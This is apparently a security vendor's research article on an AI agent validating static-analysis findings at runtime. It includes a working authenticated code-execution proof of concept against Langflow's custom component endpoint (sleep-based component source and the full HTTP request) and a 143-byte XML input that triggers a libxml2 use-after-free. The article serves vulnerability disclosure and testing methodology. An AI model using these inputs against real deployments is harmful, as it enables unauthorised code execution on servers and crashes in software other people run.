Can an AI Agent Prove SAST Findings at Runtime?
Static analysis flags possible bugs but cannot prove them. Runtime validation proved a Langflow authenticated RCE and corrected a libxml2 use-after-free's stated trigger conditions.
An autonomous agent took a SAST (static application security testing) finding on Langflow v1.7.3, submitted a custom component whose constructor sleeps ten seconds, and got the response back in 40.50 seconds, not ten. The server runs the submitted code four times for every validation request. No static analysis tool can see that 40.50-second response, because it only exists when the code is running. A second case, a use-after-free in libxml2, shows runtime testing correcting the finding itself: three of the six conditions the report said were needed turned out not to be required.
What runtime validation adds to a SAST report
What is runtime validation?
Runtime validation is testing a static-analysis finding against a running application to confirm whether it really fires, how bad it is, and which conditions it truly needs. It turns a possible bug into a proven one, or throws it out.
Static analysis tools scan source code and flag lines that look vulnerable. They never run the code, so they cannot tell you if a flagged bug is real, how serious it is, or who it affects. Teams spend hours sorting real vulnerabilities from false positives, and a queue that is mostly noise trains developers to treat every ticket as noise, including the few that will end up in an incident report.
We put two findings through runtime validation:
- Langflow authenticated remote code execution. A simple timing test proved that code sent to the server really runs, and that it runs four times for every validation request.
- libxml2 use-after-free. Testing showed that three of the six conditions listed in the original report were not needed. The bug triggers with the parser's default settings, as long as a memory allocation fails during parsing.
In both cases, the running system told us something the code alone could not. The first bug ran more often than the code suggested. The second affected more setups than the report claimed. Findings like these are real but described wrong, so they get fixed at the wrong priority.
Checking findings this way used to take an expert about an afternoon each. An AI agent here is an autonomous scanner that plans probes, runs them against a live target, and records evidence without per-step human input. It can now run these tests automatically, for every finding that ships with a runnable target, a replayable artifact, and a signal to observe.
How was this research validated?
The findings and validations in this article were carried out by the Ostorlab Security Research Team. All runtime validations were run against a controlled, internal lab instance of Langflow (v1.7.3) and a locally rebuilt libxml2 with AddressSanitizer. The findings rest on empirical timing analysis, AddressSanitizer (ASan) memory tracking, and systematic precondition ablation (testing each stated requirement by removal).
What static analysis can see, and what it cannot
Static analysis can trace a value from a source to a sink and show that a risky path exists in the source. It cannot tell you whether that path is reachable in the deployed app, whether the input survives to the sink, how bad the result is, or which preconditions are real.
SAST is not bad at its job. It is doing a different job from the one we keep asking it to do.
A static analyser reasons over code that is not running. Within that scope it is fast, thorough, and cheap: it will read every file in a large repo before a human finishes their coffee, and it will find the exec() you forgot about in a helper module nobody has touched since 2022.
What it cannot do is answer the four questions that decide whether anyone should care:
| Question | Why source analysis cannot settle it |
|---|---|
| Is the path reachable in the deployed setup? | Depends on runtime config, feature flags, reverse-proxy routing, ingress filters, and session middleware. |
| Does the input survive to the sink intact? | Depends on serialisation formats, framework coercion, type casting, Unicode normalisation, and WAF inspection. |
| How bad is it when it fires? | Depends on the rights of the running operating system process, mounted secrets, and network isolation, not the repository permissions. |
| Which of the stated preconditions are real? | An analyser reports the conditions along the one abstract path it traced, not the smallest set of conditions needed to trigger the bug. |
That last row is the one that gets underrated, and both cases in this article turn on it. A static finding describes a way the bug could happen. It is often mistaken, by readers and by the tools themselves, for a description of the way it happens, and so of who is exposed.
This is not a complaint about a product category. It is the definition of the category. A tool reasoning over dead code cannot report facts about live processes, in the same way a map cannot tell you whether the bridge is closed right now.
Case 1: what the code said about Langflow
Langflow is a visual builder for LLM workflows. Users assemble components on a canvas, and the platform lets them write custom components in Python. That feature is the product, which is what makes this interesting: the dangerous behaviour is not an accident, it is the product specification.
The static pass over v1.7.3 produced a short, plain chain:
- A POST to
/api/v1/custom_componentcarries user-supplied Python source. - The code is loaded through Python's dynamic import machinery (
importlib). - The component class is instantiated so its inputs and outputs can be read.
__init__therefore runs, in-process, with the rights of the Langflow server process.
No sandbox, no allowlist, no AST inspection. There is no trick in it and no clever gadget chain: validation is done by running the thing.
Running Python is the feature, so the real question is who gets to do it. In a shared Langflow deployment, any account that can log in gets the full rights of the server process, not just access to its own workspace. That is the gap this finding is about.

As a static finding this is already strong, and it is still not a proof. Everything above is a claim about source. Four questions stay open, and each of them can flip the severity in either direction:
- Does the endpoint actually accept this on a deployed instance, or does a route guard or reverse proxy reject it first?
- Does authentication gate it? The finding says yes, a JWT is required, which is the difference between a critical internet-facing bug and a post-login privilege issue.
- Does
__init__really run, or does Langflow read the class without instantiating it and the analyser got the import wrong? - What can the code actually do once it runs: sleep, spawn processes, read the environment?
A reviewer can argue about all four forever. The running instance settles them in about a minute.
This path is the authenticated sibling of CVE-2025-3248, the unauthenticated code injection in /api/v1/validate/code that affects all versions before 1.3.0, where exec() on submitted code runs decorators and default arguments right away. Same design decision, different door: /api/v1/custom_component. Version 1.3.0 closed the unauthenticated door, but the authenticated one was still open on v1.7.3. We reported it to the Langflow maintainers through a GitHub Security Advisory (GHSA-8xrc-2jr4-78j7, private at the time of reporting) on 9 March 2026. They triaged and accepted it, but at the time of writing there is still no patched release and no CVE, and our follow-up requests have gone unanswered.
If you run a shared Langflow instance, treat /api/v1/custom_component and /api/v1/validate/code as admin-only endpoints until a patch ships; do not expose them to tenant accounts.
All testing was done on our own lab instance.
Case 1: what the running instance said
The agent logged in, got a JWT, and submitted components to /api/v1/custom_component on a lab host.
The first payload is not an exploit. It is a negative control:
from langflow.custom import Component
from langflow.io import Output
class Recon(Component):
display_name = "Recon"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
outputs = [Output(display_name="o", name="o", method="b")]
def b(self):
return ""
The agent submits this component via HTTP POST:
POST /api/v1/custom_component HTTP/1.1
Host: langflow.example.com:7860
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Content-Type: application/json
{
"code": "from langflow.custom import Component\nfrom langflow.io import Output\n\nclass Recon(Component):\n display_name = \"Recon\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n outputs = [Output(display_name=\"o\", name=\"o\", method=\"b\")]\n def b(self):\n return \"\"\n"
}
That returns HTTP/1.1 200 OK and {"message": "Component validated successfully"} in 0.43 seconds. Now there is a baseline, and anything that moves away from it means something.
The test is a sleep in the constructor. It needs no outbound network, writes nothing to disk, and cannot be confused with an error path:
import time
from langflow.custom import Component
from langflow.io import Output
class TimingOracle(Component):
display_name = "TimingOracle"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
time.sleep(10) # Injected delay oracle
outputs = [Output(display_name="o", name="o", method="b")]
def b(self):
return ""
The measured response times across durations:
| Payload | Expected delay | Measured response | Multiplier |
|---|---|---|---|
| Baseline, no sleep | 0 s | 0.43 s | N/A |
time.sleep(3) |
3 s | 12.53 s | ~4× |
time.sleep(5) |
5 s | 20.45 s | ~4× |
time.sleep(10) |
10 s | 40.50 s | ~4× |

Three things fall out of that table, and only one of them was in the static finding.
1. The code runs. A server that only read the class AST would return in 0.43 seconds no matter what the constructor holds. The delay tracks the payload, so the constructor runs. That is the finding, confirmed.
2. It runs four times. The multiplier is steady across three different sleep durations, which rules out coincidence and network jitter. Langflow instantiates the component four times during a single validation request. The timing test proves the count, not where each run happens. Reading the validation code, these are the most likely four steps: - First, during initial dynamic loading to read field attributes. - Second, during input schema reflection. - Third, during output parameter extraction. - Fourth, during template serialisation.
A reader of the source would have said "it is instantiated during validation" and been right without being useful. Four executions per request is a force multiplier: one HTTP request buys four runs, so expensive constructor work is multiplied fourfold and any side effect fires four times, which matters if the payload is not safe to repeat.
3. The relationship is linear. 3 → 12.53s, 5 → 20.45s, 10 → 40.50s. Each reading is four times the sleep plus about half a second (0.45s to 0.53s), close to the 0.43s baseline. That is what you expect if the only thing that changed is the sleep running four times.
The run then went past the timing test to establish impact rather than just execution. Command-execution and environment-reading payloads also returned HTTP 200. Those responses suggest marker files were written under /tmp and sensitive variables were read; that part is inferred from the response code alone, not confirmed by a separate out-of-band channel, and we keep that caveat in the finding itself. At that point the question is no longer whether the code runs, but what a tenant of this platform can reach from inside the server process, which, with no sandbox, is everything the service account has. The timing test stays the strongest single piece of evidence in the chain, because it is the one with a negative control run and a linear response.
Case 2: how runtime corrected the libxml2 finding
The Langflow case shows runtime confirming a finding and adding a fact to it. The second case is less comfortable and more useful, because here runtime testing contradicted our own report.
The finding was a heap use-after-free in libxml2's ID validation: two attributes end up pointing at the same xmlID object, and freeing it once leaves the second attribute holding freed memory. The root-cause analysis was right down to the line number.
The bug traces to the February 2022 fix for CVE-2022-23308. That rework of ID-table handling left this aliasing path reachable, so it had been sitting in the library for about four years when the scan flagged it. Attached to the finding was a list of six conditions said to be needed to trigger it.

The report pins the bug to specific functions and line numbers. The alias starts in xmlAddIDSafe, where two attributes end up sharing one xmlID object. At document teardown, xmlFreeIDTable walks the ID table and frees that shared object through xmlFreeID; because the aliased entry still points at it, the next read of that entry lands in freed memory. That is the xmlFreeID frame shown in the ASan trace at the end of this section.

We rebuilt the library with AddressSanitizer and tested each condition the obvious way: remove one ingredient, sweep every allocation-failure position, and watch whether the crash survives:
| Condition removed | Crash still reproduces? | Verdict |
|---|---|---|
XML_PARSE_NOENT (entity substitution) |
Yes | Not required |
XML_PARSE_DTDVALID (DTD validation) |
Yes | Not required |
| Third, non-ID attribute on the element | Yes | Not required |
| Duplicate ID values | No | Required |
ATTLIST declaring the attributes as ID |
No | Required |
| Any allocation failure at all | No | Required |
Three of the six were not conditions. Each had a reasonable-sounding justification, and each was a true statement about the one execution trace the analyser had seen, turned into a required condition without anyone testing whether removing it stopped the crash.
The direction of the error is what matters. All three overstated the requirements. Two of them were non-default parser flags (XML_PARSE_NOENT and XML_PARSE_DTDVALID), so the finding as written told readers that both flags were needed to be affected.
In fact, the bug fires under default options, with no flags set at all. A team reading the original finding could have decided, reasonably and wrongly, that it did not apply to them.
Here is the smallest 143-byte input that, with one allocation failure injected during the parse, triggers the crash without non-default flags:
<!DOCTYPE root [
<!ELEMENT root (elem)*>
<!ATTLIST elem id1 ID #REQUIRED id2 ID #REQUIRED>
]>
<root>
<elem id1="dup" id2="dup"/>
</root>
The remaining non-obvious requirement the table keeps, alongside the duplicate IDs and the ID ATTLIST declaration, is an allocation failure: the crash needs a malloc to fail somewhere during the parse, which a fault injector inside the test harness (the fuzz harness) forces during its allocation-failure sweep. That is a memory condition, not a parser flag, so the reproduction still runs under default options. It also makes the bug hard to trigger by accident in production, because it needs an allocation to fail during the parse, a condition real workloads meet only under memory pressure, and one the harness reaches by fault injection. The point of the test is not that the crash is easy. It is that the report got wrong which setups the bug can reach at all.
And here is the AddressSanitizer crash trace, produced on default parser flags with the allocation failure injected:
=================================================================
==18492==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000420 at pc 0x7f81ab281a4b bp 0x7ffd19b3a1a0 sp 0x7ffd19b3a198
READ of size 8 at 0x608000000420 thread T0
#0 0x7f81ab281a4a in xmlFreeID /libxml2/valid.c:2892:12
#1 0x7f81ab280ef1 in xmlFreeIDTable /libxml2/valid.c:2914:5
#2 0x7f81ab251208 in xmlFreeDoc /libxml2/tree.c:1240:5
#3 0x55dc1820491a in main /libxml2/xmllint.c:3812:9
0x608000000420 is located 32 bytes inside of 48-byte region [0x608000000400,0x608000000430)
freed by thread T0 here:
#0 0x7f81ab708f30 in free (/usr/lib/x86_64-linux-gnu/libasan.so.6+0xaaf30)
#1 0x7f81ab281a4a in xmlFreeID /libxml2/valid.c:2892:12
#2 0x7f81ab280ef1 in xmlFreeIDTable /libxml2/valid.c:2914:5
=================================================================

The experiment that settled this took about twenty minutes: six variants of a 143-byte file and a sweep. The hard part, finding a use-after-free behind a guarded teardown path in seven thousand lines of validation code, was already done. The cheap part was the part that changed the answer.
What does the running system know that source code cannot?
Four facts (reachability, multiplicity, necessity, and blast radius) can only be confirmed by running the system. The two cases look nothing alike. One is a Python web service, the other a C parsing library; one is a design decision, the other a four-year-old regression. They fail the same way because both findings are claims about source code, and only a running system can confirm or contradict a source-level claim.
1. Reachability. Source analysis proves a path exists in the code. It cannot prove the path is live in the deployment. Langflow's endpoint answers, accepts the payload, and runs it: that had to be seen.
2. Multiplicity. How many times does the dangerous operation actually happen per request? Nothing in a static report flags the count, and it is easy to miss when reading the code by hand. It often decides the severity, because it turns a functional bug into a force multiplier.
3. Necessity. Static analysis reports the conditions along the path it traced. Those are sufficient conditions, presented as required ones. Only testing by removal, take one out and retry, separates the two, and the difference is the whole exposure estimate. Three of the six in the libxml2 case were not required at all.
4. Blast radius. What the code can reach at runtime depends on the process, not the repository: its user ID, its environment variables, its mounted secrets, and its network position. A container-scoped exec() and a root-scoped one produce the same source-level findings and very different incidents.
Notice that three of the four are not about whether the finding is a false positive. Everyone frames runtime validation as false-positive reduction, and it does that, but the bigger loss is the findings that are correct and badly described. Those do not get thrown out in triage. They get fixed at the wrong priority, or put off for a reason that turns out not to be true, and unlike a false positive, nobody ever finds the mistake until an incident happens.
What counts as proof of a vulnerability?
"Validated" is a word that gets used a lot in security reports, and it often means almost nothing. Here is the standard we hold our own findings to, and it is a useful standard to apply to any security report:
- A reproducible artifact. The exact request, payload, or input file, in a form someone else can replay. Not a prose description of the attack. The 143-byte XML file, the HTTP request with its headers, the custom component source.
- An oracle. Something you can watch that separates "the vulnerability fired" from "something happened". A timing delay that tracks the payload in a straight line. An AddressSanitizer abort. A marker file. An out-of-band DNS callback. Without an oracle, you have an oddity, not a result.
- A negative control. The same request with the harmless version of the payload (in Case 1, the Recon component without the sleep), showing the signal goes away. The 0.43-second baseline is doing as much work in that table as the 40.50-second reading, because it is what turns a slow response into evidence. Findings that skip the control are the ones that fall apart in the vendor's reply.
- Characterised preconditions, tested by removal. For each stated requirement, evidence that removing it stops the effect. This is the step almost everyone skips, and it is the one that decides who has to act.
- An honest boundary. What was shown, and what was inferred. Our Langflow finding shows code execution with a controlled timing test; it infers credential exposure from HTTP 200 responses, and says so in the report rather than rounding up to "full compromise proven".
A finding meeting those five is not a ticket an engineer needs to investigate. It is a ticket they need to fix, and the ticket carries its own regression test: the same request, re-run after the patch, expecting the baseline.
What does an autonomous agent actually change?
Nothing here is a new idea. Every step is what a senior penetration tester does with a SAST report and a staging environment. The reason it has not been standard practice is simple arithmetic: one tester, one afternoon, one finding, against a triage backlog that outnumbers the team's afternoons.
An autonomous agent changes the cost of that loop, not its logic:

┌────────────────────────────────────────────────────────────────────────────────────────┐
│ AUTONOMOUS RUNTIME VALIDATION PIPELINE │
├────────────────────────────────────────────────────────────────────────────────────────┤
│ 1. Static Pass ──► 2. Hypothesis ──► 3. Design Oracle & Negative Control │
│ (Path to Sink) (Evidence Criteria) (Timing / Memory Abort / DNS) │
│ │ │
│ ┌───────────────────────────────────────────────────────────┘ │
│ ▼ │
│ 4. Live System Probe ──► 5. Observable Fires? │
│ │ │
│ ┌────────────────────────┴────────────────────────┐ │
│ ▼ (No) ▼ (Yes) │
│ Refute & Log Negative Result 6. Ablate Claimed Preconditions │
│ (Record the result) │ │
│ ▼ │
│ 7. Actionable Proven Finding │
│ (PoC + Regression Test) │
└────────────────────────────────────────────────────────────────────────────────────────┘
The loop back from a refuted guess is the part that matters, and the part most automation skips. In our libxml2 run, the first three guesses about the trigger conditions were wrong, and each was disproved rather than quietly dropped; the fourth was the first one that held up. A system that reports only its wins is not doing vulnerability research: it is sampling until something crashes.
What agents are good at here is narrow, repetitive, and real: generating payload variants, holding the timing arithmetic, running the take-one-out sweep nobody has the patience for, and writing down the negative result. That libxml2 run went from source to a working proof of concept in 1 hour 54 minutes, of which the six-variant ablation sweep was about twenty minutes.
The limits are just as real, and the second case shows them at our own expense.
The agent produced a correct root cause, a working proof of concept, and a confidently wrong list of preconditions. That was not a made-up answer: every claim was a true statement about the one execution trace it had seen. The failure was generalising from a single trace without testing the generalisation, a known failure mode, and one you can design the pipeline to catch. Testing by removal is not an optional polish step at the end. It is the step that makes the rest trustworthy.
What arrives in the developer queue after runtime validation?
The practical shift is in what arrives in the developer queue:
| Metric | Unproven Finding (Raw SAST) | Proven Finding (Agentic Runtime Validation) |
|---|---|---|
| First question asked | "Is this real?" | "Sandbox or auth check?" |
| Who spends the time | Security, then developer, then security again | The developer, once |
| Evidence in ticket | A source path, file line, and a generic CWE | An executable request, verified response, and control run |
| Regression test | Written later, if ever | The proof artifact, re-run after the fix |
| Severity score | Theoretical severity argued from code | Measured severity checked against deployment |
The right column is also what makes a finding survive contact with a development team or an open-source maintainer.
"Your validation endpoint runs submitted code" invites a debate about design intent.
"Here is a component whose constructor sleeps ten seconds, here is your server taking 40.50 seconds to answer, and here is the same request without the sleep returning in 0.43 seconds" ends it.
How can teams make security findings easier to trust?
Whatever tooling your organisation uses, three practices lift finding quality right away:
- Require a negative control run. Make "what did the exact same request do without the payload?" a required field on every high-severity finding. It costs seconds and clears out false positives caused by slow endpoints, proxy timeouts, or environment latency.
- Treat precondition lists as untested claims. A finding that says "only affects deployments with setting X enabled" is just a guess until someone has turned X off and re-run the probe. That sentence decides whether your team acts; it deserves the same testing as the vulnerability itself.
- Keep negative results. A disproved guess is not a wasted run. It is the reason the next scan does not re-raise the same alert, and it is the audit trail that shows your tooling is reasoning rather than guessing.
Why runtime validation changes the triage queue
A static finding is a good question, not an answer. It tells you where to look. Only the running system can tell you whether the bug is real, how often it fires, what it really needs, and how far it reaches.
The two cases show both sides of that. In Langflow, runtime testing confirmed the finding and added a fact nobody could read from the code: four executions per request. In libxml2, it did the opposite and corrected the finding, showing that half of the stated preconditions were not needed and that the bug can reach many more setups than the report suggested.
Neither result needed a new idea. Each needed an experiment: a clear signal, a control run, and a test for every stated condition. That work was always possible and always too slow to do by hand at scale. An agent makes it cheap enough to run on every finding that has a runnable target and a signal to observe, which is what turns a noisy queue of maybes into a short list of proven, ready-to-fix bugs.
Ostorlab runs this whole process in a single pass: the static analysis finds candidate paths, and Ostorlab Agentic Deep Scan carries them straight to a live instance to design, probe, and test the proof. The take-one-out step works out the true precondition list rather than inheriting assumptions from dead source code. Both findings discussed here came straight out of that pipeline.
Run an Agentic Deep Scan to turn your static findings into proven, ready-to-fix results.
Frequently Asked Questions (FAQ)
What is the difference between SAST and runtime validation?
SAST (static application security testing) reads source code that is not running and reports where a risky path exists. Runtime validation runs the target and checks whether that path actually fires, how hard, and under what conditions. SAST finds candidates; runtime validation turns a candidate into a proof or throws it out.
Why did the Langflow request take 40.50 seconds for a 10-second sleep?
Langflow creates the submitted component about four times during one validation request, so the constructor, and its time.sleep(10), runs four times. Four sleeps of ten seconds plus a small overhead gives roughly 40.5 seconds. The same four-times pattern shows up at three and five seconds, which is how we know it is real and not network noise.
Is the Langflow issue the same as CVE-2025-3248?
No, but they are close relatives. CVE-2025-3248 is an unauthenticated code injection in /api/v1/validate/code, fixed in 1.3.0. The path here is the authenticated sibling on /api/v1/custom_component. Same underlying design decision, different door. The unauthenticated one was fixed in 1.3.0; the authenticated one was still open on v1.7.3 when we tested. We reported it to the Langflow maintainers on 9 March 2026 (advisory GHSA-8xrc-2jr4-78j7); it had no patch and no CVE at the time of writing.
What is a timing oracle, and why trust it?
A timing oracle is a payload whose only job is to make the server take a measurable, predictable amount of extra time, here a sleep in the constructor. You trust it because it comes with a negative control (the same request with no sleep returns in 0.43 seconds) and a linear response (three, five, and ten seconds all scale by the same factor). Together those rule out chance and network jitter.
What does "testing by removal" (ablation) mean for preconditions?
It means taking one stated requirement out and re-running the test. If the bug still fires, that requirement was never needed. In the libxml2 case, three of the six stated conditions turned out to be optional, and the bug fired under default parser settings (an injected allocation failure is still required), the opposite of what the original write-up implied.
Does runtime validation replace SAST?
No. It sits on top of it. SAST is fast and thorough at finding candidate paths across a whole codebase. Runtime validation is what proves which of those candidates are real and describes them correctly. You want both.
Were these tests run against real production systems?
No. Both findings were validated against our own lab and test targets that we set up and control. The point of the article is the method, not access to anyone else's system.
Sources & References
| Source | Reference & Context |
|---|---|
| Langflow Project Repository | github.com/langflow-ai/langflow : Custom Python component architecture and validation endpoint. |
| CVE-2025-3248 | NVD: CVE-2025-3248 : Unauthenticated code injection in /api/v1/validate/code, Langflow versions before 1.3.0. |
| libxml2 CVE-2022-23308 Fix | GNOME libxml2 commit 652dd12 : Upstream fix (February 2022) for CVE-2022-23308, a use-after-free of ID and IDREF attributes. Its rework of ID-table handling left the aliasing path described above reachable. |
| AI Pentesting Trust & Evidence | Ostorlab: AI Can Run the Attack. Can You Trust the Result? : Minimum evidence bars and validation controls for autonomous agents. |
| Autonomous Pentesting Scope Drift | Ostorlab: Post-Mortem: Why Autonomous AI Agents Escape Scope : Containment architecture and operational guardrails. |